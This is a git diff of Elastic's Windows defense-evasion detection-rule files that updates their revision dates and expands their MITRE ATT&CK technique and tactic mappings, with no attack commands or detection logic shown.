a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -167,39 +167,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_process_injection.toml b/rules/windows/defense_evasion_posh_process_injection.toml index 26f4689951f..5d9f0f7e6d4 100644 --- a/rules/windows/defense_evasion_posh_process_injection.toml +++ b/rules/windows/defense_evasion_posh_process_injection.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -139,10 +139,12 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.001" name = "Dynamic-link Library Injection" @@ -153,35 +155,38 @@ id = "T1055.002" name = "Portable Executable Injection" reference = "https://attack.mitre.org/techniques/T1055/002/" - +[[rule.threat.technique.subtechnique]] +id = "T1055.004" +name = "Asynchronous Procedure Call" +reference = "https://attack.mitre.org/techniques/T1055/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_proxy_execution_via_msdt.toml b/rules/windows/defense_evasion_proxy_execution_via_msdt.toml index 0bb678f64c1..f388d537933 100644 --- a/rules/windows/defense_evasion_proxy_execution_via_msdt.toml +++ b/rules/windows/defense_evasion_proxy_execution_via_msdt.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/31" integration = ["endpoint", "windows", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,14 +110,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml index d3516cd5119..74bb37e8196 100644 --- a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml +++ b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,31 +94,36 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/defense_evasion_regmod_remotemonologue.toml b/rules/windows/defense_evasion_regmod_remotemonologue.toml index 7aba4b1f611..8bf18cae23b 100644 --- a/rules/windows/defense_evasion_regmod_remotemonologue.toml +++ b/rules/windows/defense_evasion_regmod_remotemonologue.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2025/09/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,6 +118,7 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -128,9 +129,25 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.015" +name = "Component Object Model Hijacking" +reference = "https://attack.mitre.org/techniques/T1546/015/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/defense_evasion_sccm_scnotification_dll.toml b/rules/windows/defense_evasion_sccm_scnotification_dll.toml index 2e9bde60d3e..9091ea5c386 100644 --- a/rules/windows/defense_evasion_sccm_scnotification_dll.toml +++ b/rules/windows/defense_evasion_sccm_scnotification_dll.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -74,14 +74,18 @@ CcmExec, part of Microsoft's System Center Configuration Manager, manages client [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_script_via_html_app.toml b/rules/windows/defense_evasion_script_via_html_app.toml index 79779d38a9d..b170725e2ac 100644 --- a/rules/windows/defense_evasion_script_via_html_app.toml +++ b/rules/windows/defense_evasion_script_via_html_app.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/09" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [rule] @@ -121,10 +121,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" @@ -135,10 +137,30 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml index 18215c26fe3..c4916cbff20 100644 --- a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,6 +99,7 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -108,32 +109,44 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/windows/defense_evasion_suspicious_certutil_commands.toml b/rules/windows/defense_evasion_suspicious_certutil_commands.toml index d31877d1658..9698c3f6a7a 100644 --- a/rules/windows/defense_evasion_suspicious_certutil_commands.toml +++ b/rules/windows/defense_evasion_suspicious_certutil_commands.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -140,14 +140,44 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml index cf9205c5fcc..9a072d913eb 100644 --- a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml +++ b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,15 +86,32 @@ process where host.os.type == "windows" and event.type == "start" and process.ex [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + [[rule.threat.technique.subtechnique]] id = "T1218.010" name = "Regsvr32" @@ -105,18 +122,24 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -127,10 +150,17 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.003" +name = "Malicious Image" +reference = "https://attack.mitre.org/techniques/T1204/003/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml index 30a19f5a7ff..601825fa93b 100644 --- a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml +++ b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,14 +95,46 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml b/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml index d6f9837abe0..82c550c5890 100644 --- a/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml +++ b/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/24" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,14 +83,18 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_suspicious_scrobj_load.toml b/rules/windows/defense_evasion_suspicious_scrobj_load.toml index 8b30df05e2c..e931dae2d5f 100644 --- a/rules/windows/defense_evasion_suspicious_scrobj_load.toml +++ b/rules/windows/defense_evasion_suspicious_scrobj_load.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,19 +94,31 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.010" name = "Regsvr32" reference = "https://attack.mitre.org/techniques/T1218/010/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_suspicious_wmi_script.toml b/rules/windows/defense_evasion_suspicious_wmi_script.toml index 45706563ed1..3e0c53a79a2 100644 --- a/rules/windows/defense_evasion_suspicious_wmi_script.toml +++ b/rules/windows/defense_evasion_suspicious_wmi_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,26 +83,31 @@ sequence by process.entity_id with maxspan = 2m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml index 2b461a36b16..611a28342ca 100644 --- a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml +++ b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -131,6 +131,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" @@ -141,21 +142,35 @@ id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml index 5c5acb3734e..2126ccfcd1d 100644 --- a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml +++ b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -136,26 +136,39 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1211" name = "Exploitation for Defense Evasion" reference = "https://attack.mitre.org/techniques/T1211/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/defense_evasion_untrusted_driver_loaded.toml b/rules/windows/defense_evasion_untrusted_driver_loaded.toml index c9a0df30ca0..9746c1f2d3b 100644 --- a/rules/windows/defense_evasion_untrusted_driver_loaded.toml +++ b/rules/windows/defense_evasion_untrusted_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/04" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -119,19 +119,28 @@ driver where host.os.type == "windows" and process.pid == 4 and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.006" +name = "Code Signing Policy Modification" +reference = "https://attack.mitre.org/techniques/T1553/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml index ef3d4c6c627..51aaa7fc900 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,14 +88,26 @@ sequence by host.id, process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/defense_evasion_unusual_process_network_connection.toml b/rules/windows/defense_evasion_unusual_process_network_connection.toml index 8dd19e5c315..4b7683de54e 100644 --- a/rules/windows/defense_evasion_unusual_process_network_connection.toml +++ b/rules/windows/defense_evasion_unusual_process_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,14 +95,38 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" +[[rule.threat.technique.subtechnique]] +id = "T1127.002" +name = "ClickOnce" +reference = "https://attack.mitre.org/techniques/T1127/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.003" +name = "JamPlus" +reference = "https://attack.mitre.org/techniques/T1127/003/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml index 236dce5f9bd..2d1d79edb6c 100644 --- a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml +++ b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,14 +91,18 @@ file where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_windows_filtering_platform.toml b/rules/windows/defense_evasion_windows_filtering_platform.toml index 2b3015a7db9..2bf6e1fcd18 100644 --- a/rules/windows/defense_evasion_windows_filtering_platform.toml +++ b/rules/windows/defense_evasion_windows_filtering_platform.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -136,19 +136,23 @@ sequence by winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + 